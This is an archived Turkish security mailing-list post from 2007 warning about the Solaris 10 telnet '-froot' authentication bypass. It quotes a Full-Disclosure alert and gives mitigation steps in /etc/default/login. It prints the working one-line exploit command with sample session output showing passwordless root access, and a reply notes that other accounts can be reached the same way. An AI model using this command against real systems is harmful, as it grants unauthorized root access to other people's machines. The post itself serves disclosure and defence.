[prev in list] [next in list] [prev in thread] [next in thread]
List: linux-guvenlik
Subject: [Linux-guvenlik] Re: Solaris Telnet Uzaktan Root Erisimi acigi.
From: huzeyfe () enderunix ! org (Huzeyfe Onal)
Date: 2007-02-12 17:09:10
Message-ID: ffa9ac690702120708u5f5847c6u7e0003ba6c82469 () mail ! gmail ! com
[Download RAW message or body]
Merhabalar,
root'un sisteme erisimi kapatilsa dahi sisteme erisimi olan diger
kullanicilar(adm vs) yine ayni yontemle parolasiz girebiliyor.
On 2/12/07, Huzeyfe Onal <huzeyfe@enderunix.org> wrote:
>
> Solaris kullanan arkadaslarin dikkatine;
>
> Solaris 10(SunOS 5.10) sistemlerde [testlerimde daha eski surumlerde
> calismadi ]telnet acik ve herkes baglanabiliyorsa ciddi risk altindasiniz
> demektir. Solaris sistemlere uzaktan telnet ile -froot kullanicisini
> kullanarak parolasiz erisilebiliyor.
>
> # telnet -l -froot 10.1.1.1
>
> Trying 10.1.1.1...
> Connected to 10.1.1.1.
> Escape character is '^]'.
> [ Trying mutual KERBEROS5 ( host/10.1.1.1@1.1.1)... ]
> Kerberos V5: mk_req failed (No such file or directory)
> [ Trying KERBEROS5 ( host/10.1.1.1@1.1.1)... ]
> Kerberos V5: mk_req failed (No such file or directory)
> Last login: Mon Feb 12 15:20:12 on console
> Sun Microsystems Inc. SunOS 5.10 Generic January 2005
> Sourcing //.profile-ES.....
> root@dslam0 # root@dslam00 #
>
> komutu ile sisteme root erisimi saglanabiliyor.
>
> Bu aciktan korunmak icin sisteme telnet ile yapilan root erisimlerini
> engellemek yetiyor.
>
> Adim Adim telnet ile sisteme root erisimi nasil engellenir;
>
> 1)
>
> /etc/default/login
> dosyasi acilir.
>
> 2)
> # CONSOLE=/dev/console
> satiri bulunur ve basindaki # kaldirilir.
>
> 3)
>
> pkill -HUP telnetd
>
> komutu calistirilarak telnet daemonun root erisimi kapatilmis olur.
>
> '94 yilinda aciklanmis benzer bir acik:
> http://www.securityfocus.com/bid/458
>
>
> ---------- Forwarded message ----------
> From: Gadi Evron < ge@linuxbox.org>
> Date: Feb 12, 2007 8:00 AM
> Subject: [Full-disclosure] Solaris telnet vulnberability - how many on
> your network?
> To: bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
>
> Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
> the DSHIELD list:
>
> ----
> If you run Solaris, please check if you got telnet enabled NOW. If you
>
> can, block port 23 at your perimeter. There is a fairly trivial
> Solaris telnet 0-day.
>
> telnet -l "-froot" [hostname]
>
> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
> https://isc.sans.org/contact.html
> if you have any details about the use of this exploit.
> ----
>
> You mean they still use telnet?!
>
> Update from HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"
>
> On the exploits@ mailing list and on DSHIELD this vulnerability was
> verified as real.
>
> If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a
> strong suggestion.
>
> Anyone else running Solaris?
>
> Gadi.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
> Huzeyfe ONAL
> huzeyfe@enderunix.org
> http://www.enderunix.org/huzeyfe
> +90 555 255 4593
>
> Ag guvenligi listesine uye oldunuz mu?
> http://www.huzeyfe.net/netsec.html
> ---
>
> --
> Huzeyfe ONAL
> huzeyfe@enderunix.org
> http://www.enderunix.org/huzeyfe
> +90 555 255 4593
>
> Ag guvenligi listesine uye oldunuz mu?
> http://www.huzeyfe.net/netsec.html
> ---
>
--
Huzeyfe ONAL
huzeyfe@enderunix.org
http://www.enderunix.org/huzeyfe
+90 555 255 4593
Ag guvenligi listesine uye oldunuz mu?
http://www.huzeyfe.net/netsec.html
---
-------------- sonraki bölüm --------------
Bir HTML eklentisi temizlendi...
URL: http://liste.linux.org.tr/pipermail/linux-guvenlik/attachments/20070212/93d27541/attachment.htm
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic